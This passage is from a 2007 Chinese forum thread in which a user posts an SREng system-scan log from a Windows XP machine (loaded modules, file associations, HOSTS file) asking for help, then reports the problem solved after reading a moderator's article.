  [C:\Program Files\Common Files\Symantec Shared\ccProSub.dll] [Symantec Corporation, 104.0.11.1]
  [C:\Program Files\Common Files\Symantec Shared\ccAlert.dll] [Symantec Corporation, 104.0.11.1]
  [C:\Program Files\Symantec AntiVirus\Cliscan.dll] [Symantec Corporation, 10.1.5.5000]
  [C:\Program Files\Symantec AntiVirus\NAVNTUTL.DLL] [Symantec Corporation, 10.1.5.5000]
  [C:\WINDOWS\system32\sfc_os.dll] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
  [C:\Program Files\Common Files\Symantec Shared\ccSet.dll] [Symantec Corporation, 104.0.11.1]
  [C:\WINDOWS\system32\UxTheme.dll] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
  [C:\Program Files\Symantec AntiVirus\Cliproxy.dll] [Symantec Corporation, 10.1.5.5000]
[PID: 1728][C:\Program Files\360safe\safemon\360Tray.exe] [奇虎网, 3, 3, 0, 1005]
  [C:\Program Files\360safe\safemon\SafeKrnl.dll] [奇虎网, 3, 2, 0, 1001]
  [C:\Program Files\360safe\AntiAdwa.dll] [360Safe.com, 3, 3, 0, 1004]
[PID: 2004][C:\WINDOWS\system32\ctfmon.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
  [C:\WINDOWS\system32\UxTheme.dll] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 2240][C:\WINDOWS\system32\conime.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
  [C:\WINDOWS\system32\UxTheme.dll] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 2272][C:\Program Files\Internet Explorer\IEXPLORE.EXE] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
  [C:\WINDOWS\system32\UxTheme.dll] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
  [C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll] [Adobe Systems Incorporated, 7.0.0.2004121400]
  [C:\WINDOWS\system32\MSVCR71.dll] [Microsoft Corporation, 7.10.3052.4]
  [C:\WINDOWS\system32\sfc_os.dll] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
  [C:\WINDOWS\system32\Macromed\Flash\Flash9b.ocx] [Adobe Systems, Inc., 9,0,28,0]
[PID: 3564][C:\WINDOWS\system32\taskmgr.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
  [C:\WINDOWS\system32\UxTheme.dll] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 4048][C:\WINDOWS\system32\notepad.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
  [C:\WINDOWS\system32\UxTheme.dll] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 660][C:\Documents and Settings\Administrator.5C3AD5EE7D454E4\桌面\sreng2\SREng.EXE] [Smallfrogs Studio, 2.4.12.806]
  [C:\WINDOWS\system32\UxTheme.dll] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
  [C:\WINDOWS\system32\sfc_os.dll] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]

==================================
文件关联
.TXT Error. [C:\WINDOWS\NOTEPAD.EXE %1]
.EXE OK. ["%1" %*]
.COM OK. ["%1" %*]
.PIF OK. ["%1" %*]
.REG OK. [regedit.exe "%1"]
.BAT OK. ["%1" %*]
.SCR OK. ["%1" /S]
.CHM Error. [C:\WINDOWS\hh.exe %1]
.HLP Error. [C:\WINDOWS\winhlp32.exe %1]
.INI Error. [C:\WINDOWS\NOTEPAD.EXE %1]
.INF Error. [C:\WINDOWS\NOTEPAD.EXE %1]
.VBS OK. [%SystemRoot%\System32\WScript.exe "%1" %*]
.JS  OK. [%SystemRoot%\System32\WScript.exe "%1" %*]
.LNK OK. [{00021401-0000-0000-C000-000000000046}]

==================================
Winsock 提供者
N/A

==================================
Autorun.inf
N/A

==================================
HOSTS 文件
127.0.0.1    localhost

==================================
API HOOK
N/A

==================================
隐藏进程
N/A

==================================


[/CODE]

希望高手能帮忙解决,谢谢!
gototop
 
0束枭0
头像
初生襁褓狮
  • 帖子:7
  • 注册: 2007-05-19
  • 来自:
发表于: 2007-05-19 19:12 | 只看楼主 短消息 资料
字号: 6楼

看了版主的文章
http://forum.ikaka.com/topic.asp?board=28&artid=8296495
问题已解决,谢谢!!!
gototop
 
<<上一主题|下一主题>>
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT